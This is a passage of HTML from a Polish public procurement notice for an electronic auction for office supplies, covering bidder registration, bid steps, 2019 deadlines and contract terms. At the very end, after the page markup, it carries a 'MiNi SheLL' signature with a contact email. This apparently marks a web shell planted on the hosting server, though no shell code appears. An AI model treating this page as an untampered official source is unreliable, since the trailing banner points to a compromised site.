ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6">https://licytacje.uzp.gov.pl</span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7">www.1bltr.wp.mil.pl</span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8">1. Wykonawca ma prawo złożyć tylko jeden Wniosek.2. Z platformy w pełnym zakresie mogą korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod adresem https://licytacje.uzp.gov.pl Wykonawca, aby umożliwić Zamawiającemu dopuszczenie do udziału w licytacji, winien zarejestrować się w systemie dostępnym na stronie https://licytacje.uzp.gov.pl, a wraz z wnioskiem o dopuszczenie do udziału w licytacji, powinien przekazać Zamawiającemu informację o swoim loginie. 3. Login powinien uniemożliwić identyfikację Wykonawcy. W przypadku niepodania loginu we wniosku, lub też błędnego podania loginu niezarejestrowanego na stronie https://licytacje.uzp.gov.pl, Zamawiający wezwie Wykonawcę do uzupełnienia w wyznaczonym terminie loginu, który umożliwi przypisanie Wykonawcy do prowadzonej licytacji poprzez jego wpisanie na listę Wykonawców (na platformie licytacji) biorących w niej udział. Brak uzupełnienia w wyznaczonym terminie loginu, skutkować będzie brakiem możliwości wzięcia udziału Wykonawcy w licytacji. Uwaga: nie należy przesyłać swojego hasła Zamawiającemu, ani udostępniać hasła osobom nieuprawnionym.4. Licytacja elektroniczna na dostawę materiałów i artykułów biurowych, będzie licytacją 1-etapową.5. W toku licytacji elektronicznej Wykonawcy składają kolejne korzystniejsze postąpienia. Możliwość złożenia postąpień istnieje od otwarcia licytacji do jej zamknięcia.6. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą.7. W toku licytacji Wykonawcy proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach; grosze należy oddzielić od złotych kropką. Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. Zamawiający przyjął za minimalne postąpienia wartość 1.000,00 PLN brutto. W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych przez nich ofert, z tym, że do momentu zamknięcia nie ujawni informacji umożliwiających identyfikację Wykonawców.8. W celu zapewnienia aktualności listy postąpień niezbędne będzie samodzielne odświeżanie ekranu przy użyciu przycisku przeglądarki internetowej - system nie dokonuje odświeżania automatycznie.9. Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje w chwili zamknięcia licytacji elektronicznej najniższą cenę brutto za realizację całego zamówienia.10. Cena oferty winna obejmować wszystkie koszty i składniki wraz z narzutami niezbędne do wykonania przedmiotu zamówienia. Bezpośrednio po zamknięciu licytacji elektronicznej Zamawiający poda na swojej stronie internetowej nazwę oraz adres Wykonawcy, którego ofertę wybrano.11. Formalności niezbędne do zawarcia umowy jakie powinny zostać dopełnione po borze oferty: w celu zawarcia umowy Wykonawca winien:1) przedłożyć pełnomocnictwo do zawarcia umowy, jeżeli nie wynika ono z treści wniosku o dopuszczenie do udziału w licytacji elektronicznej;2) umowę regulującą współpracę, w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o zamówienie;3) przekazać drogą elektroniczną (fax, e-mail) informacje dotyczących danych do umowy (m.in. adres siedziby firmy, osoby do kontaktu) oraz inne niezbędne wynikające z treści umowy, wysokość kwoty netto wynikająca z oferty;4) dla każdego artykułu z przedmiotu umowy wybrany Wykonawca musi złożyć dokumenty potwierdzające wymagania określone w opisie przedmiotu zamówienia np. karty produktu, opis przedmiotu itp. Niedopełnienie powyższych formalności stanowić będzie uchylenie się Wykonawcy od zawarcia Umowy.12. Czas trwania licytacji elektronicznej: 30 min.</span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja jednoetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: 30 min</span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani">Nie</span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data">2019-05-10</span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"> 10:00:00</span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12">28.05.2019 r. godz. 10:00</span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13">Licytacja zakończy się w dniu otwarcia licytacji tj. o godzinie 10:30. Zamawiający zamyka licytację, gdy w podstawowym czasie nie została złożona żadna oferta (postąpienie).</span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">Zgodnie ze wzorem Istotnych warunków umowy, stanowiącym załącznik nr 4</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje">Wszelkie informacje, w celu sprawnego przeprowadzenia postępowania o udzielenie zamówienia w trybie licytacji elektronicznej znajdują się w załączniku nr 1 do ogłoszenia - Informacje dotyczące postępowania w trybie licytacji elektronicznej. Od momentu otwarcia licytacji do momentu zamknięcia licytacji, zgodnie z art. 77 ustawy Pzp, Zamawiający i Wykonawcy przekazują wnioski, oświadczenia i inne drogą elektroniczną, za pośrednictwem platformy licytacyjnej. Zaproszenie do udziału w licytacji elektronicznej przekazane zostanie Wykonawcom przez Zamawiającego drogą elektroniczną.Wszelkie informacje dotyczące niniejszego postępowania do momentu upływu terminu otwarcia licytacji, będą zamieszczane na stronie internetowej Zamawiającego https://1bltr.wp.mil.pl. Wszelka korespondencja powinna być opatrzona nr sprawy tj. 13/2019. Załącznikami do niniejszego ogłoszenia, udostępnionymi na stronie internetowej Zamawiającego www.1bltr.wp.mil.pl:1) informacje dotyczące postępowania w trybie licytacji elektronicznej;2) opis przedmiotu zamówienia;3) wniosek o dopuszczenie do udziału w licytacji elektronicznej;4) istotne warunki umowy;5) wzór oświadczenia o spełnianiu warunków udziału w postępowaniu;6) wzór oświadczenia o braku podstaw wykluczenia.</span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron umowy wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Wykonawca zobowiązuje się do pisemnego poinformowania Zamawiającego, o stanie realizacji przedmiotu umowy w przypadku spodziewanego opóźnienia w realizacji dostawy przedmiotu umowy lub wystąpienia innych problemów związanych z terminowym wykonaniem umowy, w szczególności, gdy pojawi się zagrożenie jej wykonania.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-05-10</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com